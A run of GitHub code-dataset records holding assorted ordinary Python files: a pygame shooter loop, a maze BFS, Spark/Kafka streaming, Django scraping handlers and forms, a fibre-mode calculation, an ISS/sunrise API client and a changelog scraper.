pygame.key.get_pressed()[pygame.K_LEFT]:\n levels[activelevel].player.moveH(0)\n if event.key == pygame.K_LSHIFT:\n levels[activelevel].player.focus(False)\n \n if pygame.key.get_pressed()[pygame.K_SPACE] and lastFiring > 200:\n bullet = levels[activelevel].player.shoot()\n levels[activelevel].collective.add(bullet)\n levels[activelevel].fbullet.add(bullet)\n lastFiring = 0\n background.fill(levels[activelevel].levelcolor)\n levels[activelevel].draw(background)\n screen.blit(background,(0,0))\n \n screen.blit(scorefont.render(\"Score \" + str(score[0]),0,(0,0,0)),(SCREENWIDTH/2-20,0))\n \n if levels[activelevel].update(score):\n activelevel += 1\n if activelevel >= len(levels):\n done = True\n won = True\n \n clock.tick(30)\n lastFiring += clock.get_time()\n \n #drawnRects.draw(background)\n \n pygame.display.flip()\n\n#endloop\nwhile won:\n \n if pygame.event.peek():\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n won = False;\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_ESCAPE:\n won = False\n background.fill((255,255,255))\n screen.blit(background,(0,0))\n screen.blit(scorefont.render(\"Your final score was \" + str(score[0]),1,(0,0,0)),(SCREENWIDTH/2-150,SCREENHEIGHT/2 -60))\n screen.blit(scorefont.render(\"YOU WIN!\",1,(0,0,0)),(SCREENWIDTH/2-100,0))\n screen.blit(scorefont.render(\"Press ESC to end\", 1,(0,0,0)),(SCREENWIDTH/2-100,400))\n pygame.display.flip()\n\n\npygame.quit()\n ", "repo_name": "montepy/PyBullet", "sub_path": "PyBulletPrimaryTesting/PyBulletPrimaryTesting/PyBulletPrimaryTesting.py", "file_name": "PyBulletPrimaryTesting.py", "file_ext": "py", "file_size_in_byte": 3436, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "pygame.init", "line_number": 6, "usage_type": "call"}, {"api_name": "pygame.display.set_mode", "line_number": 10, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 10, "usage_type": "attribute"}, {"api_name": "pygame.display.set_caption", "line_number": 11, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 11, "usage_type": "attribute"}, {"api_name": "pygame.key.set_repeat", "line_number": 12, "usage_type": "call"}, {"api_name": "pygame.key", "line_number": 12, "usage_type": "attribute"}, {"api_name": "pygame.Surface", "line_number": 13, "usage_type": "call"}, {"api_name": "Level.Level", "line_number": 15, "usage_type": "call"}, {"api_name": "pygame.time.Clock", "line_number": 20, "usage_type": "call"}, {"api_name": "pygame.time", "line_number": 20, "usage_type": "attribute"}, {"api_name": "pygame.font.Font", "line_number": 23, "usage_type": "call"}, {"api_name": "pygame.font", "line_number": 23, "usage_type": "attribute"}, {"api_name": "pygame.event.peek", "line_number": 27, "usage_type": "call"}, {"api_name": "pygame.event", "line_number": 27, "usage_type": "attribute"}, {"api_name": "pygame.event.get", "line_number": 28, "usage_type": "call"}, {"api_name": "pygame.event", "line_number": 28, "usage_type": "attribute"}, {"api_name": "pygame.QUIT", "line_number": 29, "usage_type": "attribute"}, {"api_name": "pygame.KEYDOWN", "line_number": 31, "usage_type": "attribute"}, {"api_name": "pygame.K_ESCAPE", "line_number": 32, "usage_type": "attribute"}, {"api_name": "pygame.K_LSHIFT", "line_number": 34, "usage_type": "attribute"}, {"api_name": "pygame.K_UP", "line_number": 36, "usage_type": "attribute"}, {"api_name": "pygame.K_DOWN", "line_number": 38, "usage_type": "attribute"}, {"api_name": "pygame.K_RIGHT", "line_number": 40, "usage_type": "attribute"}, {"api_name": "pygame.K_LEFT", "line_number": 42, "usage_type": "attribute"}, {"api_name": "pygame.KEYUP", "line_number": 44, "usage_type": "attribute"}, {"api_name": "pygame.key.get_pressed", "line_number": 45, "usage_type": "call"}, {"api_name": "pygame.key", "line_number": 45, "usage_type": "attribute"}, {"api_name": "pygame.K_UP", "line_number": 45, "usage_type": "attribute"}, {"api_name": "pygame.K_DOWN", "line_number": 45, "usage_type": "attribute"}, {"api_name": "pygame.key.get_pressed", "line_number": 47, "usage_type": "call"}, {"api_name": "pygame.key", "line_number": 47, "usage_type": "attribute"}, {"api_name": "pygame.K_RIGHT", "line_number": 47, "usage_type": "attribute"}, {"api_name": "pygame.K_LEFT", "line_number": 47, "usage_type": "attribute"}, {"api_name": "pygame.K_LSHIFT", "line_number": 49, "usage_type": "attribute"}, {"api_name": "pygame.key.get_pressed", "line_number": 52, "usage_type": "call"}, {"api_name": "pygame.key", "line_number": 52, "usage_type": "attribute"}, {"api_name": "pygame.K_SPACE", "line_number": 52, "usage_type": "attribute"}, {"api_name": "pygame.display.flip", "line_number": 74, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 74, "usage_type": "attribute"}, {"api_name": "pygame.event.peek", "line_number": 79, "usage_type": "call"}, {"api_name": "pygame.event", "line_number": 79, "usage_type": "attribute"}, {"api_name": "pygame.event.get", "line_number": 80, "usage_type": "call"}, {"api_name": "pygame.event", "line_number": 80, "usage_type": "attribute"}, {"api_name": "pygame.QUIT", "line_number": 81, "usage_type": "attribute"}, {"api_name": "pygame.KEYDOWN", "line_number": 83, "usage_type": "attribute"}, {"api_name": "pygame.K_ESCAPE", "line_number": 84, "usage_type": "attribute"}, {"api_name": "pygame.display.flip", "line_number": 91, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 91, "usage_type": "attribute"}, {"api_name": "pygame.quit", "line_number": 94, "usage_type": "call"}]} +{"seq_id": "24674712233", "text": "import collections\r\nwall, clear, goal = 0, 1, 9 \r\nwidth,height=map(int,input().split())\r\n\r\ndef bfs(maze, start):\r\n queue = collections.deque()\r\n queue.append(start)\r\n seen = set([start])\r\n while queue:\r\n path = queue.popleft()\r\n print(path)\r\n x, y = path\r\n if maze[y][x] == goal:\r\n # print(maze[y][x])\r\n return True\r\n for x2, y2 in ((x+1,y), (x-1,y), (x,y+1), (x,y-1)):\r\n if ( 0 <= x2 < width and \r\n 0 <= y2 < height and \r\n maze[y2][x2] != wall and \r\n (x2, y2) not in seen): \r\n queue.append( (x2, y2))\r\n seen.add((x2, y2))\r\n return False\r\n\r\nmat=[list(map(int,input().split())) for i in range(height)]\r\n\r\nans = 0 if mat[0][0]==0 else bfs(mat,(0,0)) #check if start(0,0) is walkable or not if not return False else Run BFS\r\nprint(ans) #if path exist it will print True else prints False\r\n\r\n\r\n", "repo_name": "Rahul-p28/AI_LAB", "sub_path": "maze.py", "file_name": "maze.py", "file_ext": "py", "file_size_in_byte": 951, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "collections.deque", "line_number": 6, "usage_type": "call"}]} +{"seq_id": "24753402838", "text": "from pyspark import SparkContext\nfrom pyspark.streaming import StreamingContext\nfrom pyspark.streaming.kafka import KafkaUtils\n\nsc = SparkContext(appName=\"PythonSparkStreamingKafka\")\nsc.setLogLevel(\"WARN\")\n\nssc = StreamingContext(sc, 10)\ndirectKafkaStream = KafkaUtils.createDirectStream(ssc, [\"quickstart-events\"], {\"metadata.broker.list\": \"192.168.33.13:9092\"})\n\ndirectKafkaStream.map(lambda x: x[1]).pprint()\n\n\n#Starting Spark context\nssc.start()\nssc.awaitTermination()\n", "repo_name": "Manal-98/Data-mining", "sub_path": "spark-streaming-kafka.py", "file_name": "spark-streaming-kafka.py", "file_ext": "py", "file_size_in_byte": 473, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "pyspark.SparkContext", "line_number": 5, "usage_type": "call"}, {"api_name": "pyspark.streaming.StreamingContext", "line_number": 8, "usage_type": "call"}, {"api_name": "pyspark.streaming.kafka.KafkaUtils.createDirectStream", "line_number": 9, "usage_type": "call"}, {"api_name": "pyspark.streaming.kafka.KafkaUtils", "line_number": 9, "usage_type": "name"}]} +{"seq_id": "26323773735", "text": "import requests\nfrom bs4 import BeautifulSoup\nfrom decimal import Decimal\nimport html\nfrom assistant.models import Product, Photo, Category\nfrom assistant.utils import get_file_ext, make_filename, get_and_save_image\nfrom currency.models import Currency\n\n\nclass ProductTemplate:\n\n def __init__(self, title, price, images, text, vendor_id, currency_id, available):\n self.title = title\n self.price = price\n self.images = images\n self.text = text\n self.vendor_id = vendor_id\n self.currency_id = currency_id\n self.available = available\n\n\nclass BaseHandler:\n headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 '\n '(KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36'}\n category = Category.objects.get(title='TEST CATEGORY')\n\n def __init__(self, sourse):\n self.sourse = sourse\n self.content = None\n self.products = []\n self._set_currencies()\n self.vendor_name = sourse.rules['vandor_name'].lower()\n\n def _set_currencies(self):\n self.currencies = {i.code.upper(): i.id for i in Currency.objects.all()}\n\n def download_content(self):\n r = requests.get(self.sourse.url, headers=self.headers)\n if r.status_code == 200:\n self.content = r.text\n else:\n print('[ERROR] response status: {}'.format(r.status_code))\n\n def prepare_content(self):\n raise NotImplementedError()\n\n @staticmethod\n def decimal_or_none(digit_text):\n try:\n return Decimal(digit_text)\n except:\n return None\n\n @staticmethod\n def _download_image(path, product_pk):\n ext = get_file_ext(path)\n filename = make_filename(product_pk, ext)\n get_and_save_image(path, filename)\n return filename\n\n @staticmethod\n def _update_product(product, product_in_db):\n product_in_db.availability_prom = '+' if product.available else '-'\n product_in_db.active = product.available or False\n product_in_db.price = product.price\n product_in_db.save(update_fields=('availability_prom', 'price', 'active'))\n\n def _create_product(self, product):\n new_product = Product()\n new_product.category = self.category\n new_product.title = product.title\n new_product.price = product.price\n new_product.text = product.text\n new_product.vendor_id = product.vendor_id\n new_product.vendor_name = self.vendor_name\n new_product.currency_id = product.currency_id\n new_product.availability_prom = '+' if product.available else '-'\n new_product.active = product.available\n try:\n new_product.image = self._download_image(product.images[0], new_product.pk)\n except IndexError:\n pass\n new_product.save()\n\n try:\n for i in product.images[1:]:\n image = Photo()\n image.product = new_product\n image.image = self._download_image(i, new_product.pk)\n image.save()\n except IndexError:\n pass\n\n def create_or_update(self):\n for product in self.products:\n products_in_db = Product.objects.filter(\n vendor_id=product.vendor_id,\n vendor_name=self.vendor_name\n )\n if len(products_in_db) > 0:\n for product_in_db in products_in_db:\n self._update_product(product, product_in_db)\n else:\n self._create_product(product)\n\n def parse(self):\n print('[INFO] Parsing {}'.format(self.vendor_name))\n self.download_content()\n\n if self.content:\n self.prepare_content()\n else:\n print('[ERROR] Content is None in {}'.format(self.vendor_name))\n return False\n\n self.create_or_update()\n\n\nclass YMLYandexCatalogHandler(BaseHandler):\n\n def prepare_content(self):\n soup = BeautifulSoup(self.content, 'html5lib')\n mapping = self.sourse.rules['mapping']\n reset_currency = self.sourse.rules.get('reset_currency_code', False)\n\n for offer in soup.find_all(self.sourse.rules['cycle_tag']):\n try:\n product = ProductTemplate(\n title=html.unescape(offer.find(mapping['get_title']).text),\n price=self.decimal_or_none(offer.find(mapping['get_price']).text),\n images=[i.text for i in offer.find_all(mapping['get_image'])],\n text=html.unescape(offer.find(mapping['get_text']).text),\n vendor_id=offer.find(mapping['get_vendor_code']).text,\n currency_id=self.currencies.get(reset_currency.upper()) if reset_currency else self.currencies.get(\n offer.find(mapping['get_currency']).text.upper()),\n available=True if offer[mapping['get_available']] == 'true' else False,\n )\n self.products.append(product)\n except:\n print('[ERROR] Parsing error in VitanHandler')\n", "repo_name": "vintkor/django_ppf", "sub_path": "spider/utils/handlers.py", "file_name": "handlers.py", "file_ext": "py", "file_size_in_byte": 5132, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "assistant.models.Category.objects.get", "line_number": 25, "usage_type": "call"}, {"api_name": "assistant.models.Category.objects", "line_number": 25, "usage_type": "attribute"}, {"api_name": "assistant.models.Category", "line_number": 25, "usage_type": "name"}, {"api_name": "currency.models.Currency.objects.all", "line_number": 35, "usage_type": "call"}, {"api_name": "currency.models.Currency.objects", "line_number": 35, "usage_type": "attribute"}, {"api_name": "currency.models.Currency", "line_number": 35, "usage_type": "name"}, {"api_name": "requests.get", "line_number": 38, "usage_type": "call"}, {"api_name": "decimal.Decimal", "line_number": 50, "usage_type": "call"}, {"api_name": "assistant.utils.get_file_ext", "line_number": 56, "usage_type": "call"}, {"api_name": "assistant.utils.make_filename", "line_number": 57, "usage_type": "call"}, {"api_name": "assistant.utils.get_and_save_image", "line_number": 58, "usage_type": "call"}, {"api_name": "assistant.models.Product", "line_number": 69, "usage_type": "call"}, {"api_name": "assistant.models.Photo", "line_number": 87, "usage_type": "call"}, {"api_name": "assistant.models.Product.objects.filter", "line_number": 96, "usage_type": "call"}, {"api_name": "assistant.models.Product.objects", "line_number": 96, "usage_type": "attribute"}, {"api_name": "assistant.models.Product", "line_number": 96, "usage_type": "name"}, {"api_name": "bs4.BeautifulSoup", "line_number": 122, "usage_type": "call"}, {"api_name": "html.unescape", "line_number": 129, "usage_type": "call"}, {"api_name": "html.unescape", "line_number": 132, "usage_type": "call"}]} +{"seq_id": "5107361753", "text": "import numpy as np\nfrom fiber import fiber\nfrom stretchmesh import stretchmesh\nfrom scipy.special import jv, kv\nfrom scipy.optimize import fsolve\nfrom contourmode import contour\n\nnco = 2.5\nncl = 1.5\nr = 0.3\nwl = 1\nside = 0.2\n\ndx = 0.002\ndy = 0.002\n\nx, y, eps = fiber([nco, ncl], [r], side, dx, dy)\nx, y = stretchmesh(x, y, [96, 0, 96, 0], [4, 1, 4, 1])\n\nV = 2 * np.pi * r / wl * np.sqrt(nco**2 - ncl**2)\n\n\ndef spam(U):\n return nco ** 2 * jv(1, U) / (U * jv(0, U)) + \\\n ncl ** 2 * kv(1, np.sqrt(V ** 2 - U ** 2)) / \\\n (np.sqrt(V ** 2 - U ** 2) * kv(0, np.sqrt(V ** 2 - U ** 2)))\n\n\nU = fsolve(spam, 3.2).item()\n\nW = np.sqrt(V**2 - U**2)\nneff0 = np.sqrt(nco**2 - (U / (2 * np.pi * r / wl))**2)\n\n\nx = x.reshape(-1, 1)\ny = y.reshape(1, -1)\nrho = np.sqrt(np.dot(x**2, np.ones(y.shape)) + np.dot(np.ones(x.shape), y**2))\n\nsinphi = np.divide(np.dot(np.ones(x.shape), y), rho)\ncosphi = np.divide(np.dot(x, np.ones(y.shape)), rho)\n\nHx0 = np.zeros(rho.shape)\nHy0 = np.zeros(rho.shape)\n\nfor index, value in np.ndenumerate(rho):\n if value == 0:\n Hx0[index] = 0\n Hy0[index] = 0\n elif value < r:\n Hx0[index] = -sinphi[index] * jv(1, U * value / r) / jv(1, U)\n Hy0[index] = cosphi[index] * jv(1, U * value / r) / jv(1, U)\n elif value > r:\n Hx0[index] = -sinphi[index] * kv(1, W * value / r) / kv(1, W)\n Hy0[index] = cosphi[index] * kv(1, W * value / r) / kv(1, W)\n\nhxmax = np.amax(abs(Hx0))\nhymax = np.amax(abs(Hy0))\nHx0 = Hx0 / max(hxmax, hymax)\nHy0 = Hy0 / max(hxmax, hymax)\n\nx = x.flatten()\ny = y.flatten()\n", "repo_name": "alikaikai/myfdm", "sub_path": "examples/fiber_tm_exact.py", "file_name": "fiber_tm_exact.py", "file_ext": "py", "file_size_in_byte": 1562, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "fiber.fiber", "line_number": 17, "usage_type": "call"}, {"api_name": "stretchmesh.stretchmesh", "line_number": 18, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 20, "usage_type": "attribute"}, {"api_name": "numpy.sqrt", "line_number": 20, "usage_type": "call"}, {"api_name": "scipy.special.jv", "line_number": 24, "usage_type": "call"}, {"api_name": "scipy.special.kv", "line_number": 25, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 25, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 26, "usage_type": "call"}, {"api_name": "scipy.special.kv", "line_number": 26, "usage_type": "call"}, {"api_name": "scipy.optimize.fsolve", "line_number": 29, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 31, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 32, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 32, "usage_type": "attribute"}, {"api_name": "numpy.sqrt", "line_number": 37, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 37, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 37, "usage_type": "call"}, {"api_name": "numpy.divide", "line_number": 39, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 39, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 39, "usage_type": "call"}, {"api_name": "numpy.divide", "line_number": 40, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 40, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 40, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 42, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 43, "usage_type": "call"}, {"api_name": "numpy.ndenumerate", "line_number": 45, "usage_type": "call"}, {"api_name": "scipy.special.jv", "line_number": 50, "usage_type": "call"}, {"api_name": "scipy.special.jv", "line_number": 51, "usage_type": "call"}, {"api_name": "scipy.special.kv", "line_number": 53, "usage_type": "call"}, {"api_name": "scipy.special.kv", "line_number": 54, "usage_type": "call"}, {"api_name": "numpy.amax", "line_number": 56, "usage_type": "call"}, {"api_name": "numpy.amax", "line_number": 57, "usage_type": "call"}]} +{"seq_id": "554706284", "text": "from setuptools import setup, find_packages\nimport os\n\nversion = '1.6.5.dev0'\n\ntests_require = [\n 'ftw.testbrowser',\n 'ftw.testing',\n 'plone.app.testing',\n]\n\nsetup(\n name='ftw.colorbox',\n version=version,\n description=\"An image gallery for Plone using ColorBox\",\n long_description='{0}\\n{1}'.format(\n open(\"README.rst\").read(),\n open(os.path.join(\"docs\", \"HISTORY.txt\")).read()\n ),\n\n classifiers=[\n 'Framework :: Plone',\n 'Framework :: Plone :: 4.3',\n 'Framework :: Plone :: 5.1',\n 'Programming Language :: Python',\n 'Topic :: Software Development :: Libraries :: Python Modules',\n ],\n\n keywords='ftw colorbox',\n author='4teamwork AG',\n author_email='mailto:info@4teamwork.ch',\n url='https://github.com/4teamwork/ftw.colorbox',\n license='GPL2',\n\n packages=find_packages(exclude=['ez_setup']),\n namespace_packages=['ftw'],\n include_package_data=True,\n zip_safe=False,\n\n install_requires=[\n 'ftw.upgrade',\n 'setuptools',\n 'Plone',\n 'plone.api',\n ],\n\n tests_require=tests_require,\n extras_require=dict(tests=tests_require),\n\n entry_points=\"\"\"\n # -*- Entry points: -*-\n [z3c.autoinclude.plugin]\n target = plone\n \"\"\",\n)\n", "repo_name": "4teamwork/ftw.colorbox", "sub_path": "setup.py", "file_name": "setup.py", "file_ext": "py", "file_size_in_byte": 1276, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "setuptools.setup", "line_number": 12, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 18, "usage_type": "call"}, {"api_name": "os.path", "line_number": 18, "usage_type": "attribute"}, {"api_name": "setuptools.find_packages", "line_number": 35, "usage_type": "call"}]} +{"seq_id": "10251211992", "text": "from multiprocessing import Process\n\nimport os\nimport time\n\n\ndef info(title):\n print(title)\n print('module name:', __name__)\n if hasattr(os, 'getppid'):\n print('parent process: {}'.format(os.getppid()))\n print('process id: {}'.format(os.getpid()))\n\n\ndef f(name):\n info('function f')\n time.sleep(2)\n print('hello {}'.format(name))\n\n\nif __name__ == '__main__':\n info('main line')\n p = Process(target=f, args=('bob',))\n p.start()\n p.join()\n", "repo_name": "perrydzhu/pydem0", "sub_path": "sock/multiproc.py", "file_name": "multiproc.py", "file_ext": "py", "file_size_in_byte": 477, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "os.getppid", "line_number": 11, "usage_type": "call"}, {"api_name": "os.getpid", "line_number": 12, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 17, "usage_type": "call"}, {"api_name": "multiprocessing.Process", "line_number": 23, "usage_type": "call"}]} +{"seq_id": "15886466092", "text": "\"\"\"from turtle import Turtle, Screen\ntimmy = Turtle()\nprint(timmy)\ntimmy.shape(\"turtle\")\ntimmy.fd(100)\ntimmy.color(\"red\")\n\nmy_screen = Screen()\nprint(my_screen.canvheight)\n\nmy_screen.exitonclick()\"\"\"\n\nimport prettytable\n\nfrom prettytable import PrettyTable\ntable = PrettyTable()\nprint(table)\n#table.add_row([\"Name\",1,2])\ntable.add_column(\"age\",[11,22])\ntable.add_column(\"Name\",[11,22])\ntable.align =\"r\"\nprint(table)", "repo_name": "Harini0924/day-16-start", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 416, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "prettytable.PrettyTable", "line_number": 16, "usage_type": "call"}]} +{"seq_id": "281305449", "text": "import os\nimport yaml\nimport numpy as np\nimport random\n\nCONFIG_PATH = 'config/'\n\ndef smooth_curve(x): #사용 x\n window_len = 101\n s = np.r_[x[window_len-1:0:-1], x, x[-1:-window_len:-1]]\n w = np.kaiser(window_len, 2)\n y = np.convolve(w/w.sum(), s, mode='valid')\n return y[50:len(y)-50]\n\n\ndef shuffle_dataset(x, t): #사용 보류\n shuffled = list(zip(x, t))\n random.shuffle(shuffled)\n x = [e[0] for e in shuffled]\n t = [e[0] for e in shuffled]\n\n return x, t\n\ndef load_config(config_name):\n with open(os.path.join(CONFIG_PATH, config_name)) as file:\n config = yaml.safe_load(file)\n return config", "repo_name": "GwakJiho/DeepLearning", "sub_path": "cifar10/utils/util.py", "file_name": "util.py", "file_ext": "py", "file_size_in_byte": 640, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "numpy.r_", "line_number": 10, "usage_type": "attribute"}, {"api_name": "numpy.kaiser", "line_number": 11, "usage_type": "call"}, {"api_name": "numpy.convolve", "line_number": 12, "usage_type": "call"}, {"api_name": "random.shuffle", "line_number": 18, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 25, "usage_type": "call"}, {"api_name": "os.path", "line_number": 25, "usage_type": "attribute"}, {"api_name": "yaml.safe_load", "line_number": 26, "usage_type": "call"}]} +{"seq_id": "74813081766", "text": "from django import forms\n\nfrom account.models import Student\nfrom .models import *\n\n\nclass JudgmentFactsForm(forms.ModelForm):\n\n class Meta:\n model = JudgmentFacts\n fields = ['name', 'team_length', 'fact_max_time', 'status']\n\n\nclass FactForm(forms.ModelForm):\n\n CORRECT_ANSWER = Choices(\n (True, 'Verdadeiro'),\n (False, 'Falso'),\n )\n correct_answer = forms.ChoiceField(choices=CORRECT_ANSWER, widget=forms.RadioSelect())\n\n class Meta:\n model = Fact\n fields = ['order', 'statement', 'topic_group', 'correct_answer']\n\n def save(self, commit=True, **kwargs):\n jf = JudgmentFacts.objects.get(id=kwargs['jf_id'])\n data = self.data\n return Fact.objects.create(\n order=data['order'], statement=data['statement'], topic_group=data['topic_group'],\n correct_answer=data['correct_answer'], judgment_facts=jf\n )\n\n\nclass TeamForm(forms.ModelForm):\n\n def __init__(self, *args, **kwargs):\n super(TeamForm, self).__init__(*args, **kwargs)\n self.fields['member'].queryset = Student.objects.all().exclude(pk__in=Team.objects.all()).order_by('user__name')\n\n class Meta:\n model = Team\n fields = ['name', 'member']\n", "repo_name": "CarolClara/Julgamento-de-Fatos", "sub_path": "judgment_facts/forms.py", "file_name": "forms.py", "file_ext": "py", "file_size_in_byte": 1238, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "django.forms.ModelForm", "line_number": 7, "usage_type": "attribute"}, {"api_name": "django.forms", "line_number": 7, "usage_type": "name"}, {"api_name": "django.forms.ModelForm", "line_number": 14, "usage_type": "attribute"}, {"api_name": "django.forms", "line_number": 14, "usage_type": "name"}, {"api_name": "django.forms.ChoiceField", "line_number": 20, "usage_type": "call"}, {"api_name": "django.forms", "line_number": 20, "usage_type": "name"}, {"api_name": "django.forms.RadioSelect", "line_number": 20, "usage_type": "call"}, {"api_name": "django.forms.ModelForm", "line_number": 35, "usage_type": "attribute"}, {"api_name": "django.forms", "line_number": 35, "usage_type": "name"}, {"api_name": "account.models.Student.objects.all", "line_number": 39, "usage_type": "call"}, {"api_name": "account.models.Student.objects", "line_number": 39, "usage_type": "attribute"}, {"api_name": "account.models.Student", "line_number": 39, "usage_type": "name"}]} +{"seq_id": "12126962479", "text": "import requests\nimport json\n\nlatitude = 0.0\nlongitude = 0.0\n\ndef get_Position():\n global latitude,longitude\n api_endpoint2 =\"http://api.open-notify.org/iss-now.json\"\n\n response = requests.get(api_endpoint2)\n print(response.status_code)\n status =response.raise_for_status()\n print(status)\n ctype =response.headers['content-type']\n print(ctype)\n\n if response.status_code == 200 :\n print(\"success\")\n data = response.json()\n print(json.dumps(data, indent=4))\n position = data[\"iss_position\"]\n latitude = data[\"iss_position\"][\"latitude\"]\n longitude = data[\"iss_position\"][\"longitude\"]\n pos = (position,latitude,longitude)\n print(pos)\n else :\n print(\"something went wrong!\")\n \n\ndef get_SunriseSunset(lat ,long):\n api_endpoint2 =\"https://api.sunrise-sunset.org/json\"\n payload ={\n \"lat\" : lat ,\n \"lng\" : long\n }\n response = requests.get(api_endpoint2,params=payload)\n\n print(response.status_code)\n status =response.raise_for_status()\n ctype =response.headers['content-type']\n print(ctype)\n\n if response.status_code == 200 :\n data = response.json()\n print(json.dumps(data, indent=4))\n print(data)\n sunrise = data[\"results\"][\"sunrise\"]\n sunset = data[\"results\"][\"sunset\"]\n print(\"sunrise time is : \" ,sunrise )\n print(\"sunset time is : \" ,sunset )\n else :\n print(\"something went wrong!\")\n\n\nget_Position()\nget_SunriseSunset(latitude,longitude)", "repo_name": "yogeshdhameliya6013/python", "sub_path": "api/sunrisesunset.py", "file_name": "sunrisesunset.py", "file_ext": "py", "file_size_in_byte": 1528, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "requests.get", "line_number": 11, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 21, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 37, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 46, "usage_type": "call"}]} +{"seq_id": "42724496558", "text": "from django.contrib import admin\nfrom django.contrib.auth import login, logout\nfrom django.urls import include, path\n\n\nadmin.autodiscover()\n\nurlpatterns = (\n path(\"admin/\", admin.site.urls),\n path(\n \"registration/login/\",\n login,\n name=\"login\",\n ),\n path(\n \"registration/logout/\",\n logout,\n name=\"logout\",\n ),\n path(\"\", include(\"blog.urls\")),\n)\n", "repo_name": "lambdalisue/django-author", "sub_path": "tests/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 405, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 36, "dataset": "github-code", "pt": "53", "api": [{"api_name": "django.contrib.admin.autodiscover", "line_number": 6, "usage_type": "call"}, {"api_name": "django.contrib.admin", "line_number": 6, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 9, "usage_type": "call"}, {"api_name": "django.contrib.admin.site", "line_number": 9, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 9, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 10, "usage_type": "call"}, {"api_name": "django.contrib.auth.login", "line_number": 12, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 15, "usage_type": "call"}, {"api_name": "django.contrib.auth.logout", "line_number": 17, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 20, "usage_type": "call"}, {"api_name": "django.urls.include", "line_number": 20, "usage_type": "call"}]} +{"seq_id": "38512938406", "text": "#! /usr/bin/env python\n# -*- coding: utf-8 -*-\nimport os\nimport datetime\nimport urllib.request\nimport urllib.error\nimport urllib.parse\nimport csv\nimport json\nimport codecs\nimport lxml\nfrom lxml import html\nimport yaml\n\n\ndef convert_to_datetime_date(date):\n \"\"\"Convert date to datetime.date\n\n Params:\n date (logring): \"Nov 15 '16\"\n Return:\n (datetime.date): datetime.date(2016,11,15)\n\n >>> convert_to_datetime_date(\"Nov 15 '16\")\n datetime.date(2016, 11, 15)\n \"\"\"\n date = date.split()\n month_name = ['January', 'February', 'March', 'April', 'May', 'June',\n 'July', 'Augulog', 'September', 'October', 'November', 'December']\n month_name = [x[:3] for x in month_name]\n month = month_name.index(date[0]) + 1\n date[2] = date[2].replace(\"'\", '20')\n return datetime.date(year=int(date[2]), month=month, day=int(date[1]))\n\n\ndef start_request(url):\n request = urllib.request.urlopen(url)\n # process handle exception\n response = request.read()\n return response\n\n\ndef log_data(app, version, date, change_log, database):\n if os.path.exists(database):\n mode = 'a'\n else:\n mode = 'w'\n if change_log == '':\n change_log = 'Rand'\n fields = ['iOS', date, '1', app, '1', '1',\n 'Version', 'Rand', version, change_log]\n fields_name = ['Platform', 'Date', 'App ID', 'App Name', 'Publisher ID',\n 'Publisher Name', 'Update Type', 'Previous Value', 'New Value', 'Notes']\n\n stream = open(database, mode)\n writer = csv.writer(stream)\n if mode == 'w':\n writer.writerow(fields_name)\n writer.writerow(fields)\n\n\ndef format_change_log(log):\n \"\"\"Reformat application news log to desired form.\n\n \"\"\"\n # print(log)\n detele_char = [\"u'\", 'u\"', \"'\", '\"', \"

\",\n \"
\", \"

\", '-', '[', ']', \"
